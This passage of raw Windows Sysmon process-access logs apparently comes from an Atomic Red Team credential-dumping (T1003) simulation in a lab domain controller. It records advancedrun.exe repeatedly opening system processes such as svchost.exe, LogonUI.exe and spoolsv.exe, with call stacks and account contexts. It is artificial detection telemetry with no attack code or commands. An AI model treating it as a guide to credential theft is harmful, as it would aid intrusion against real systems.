Run\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003953002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 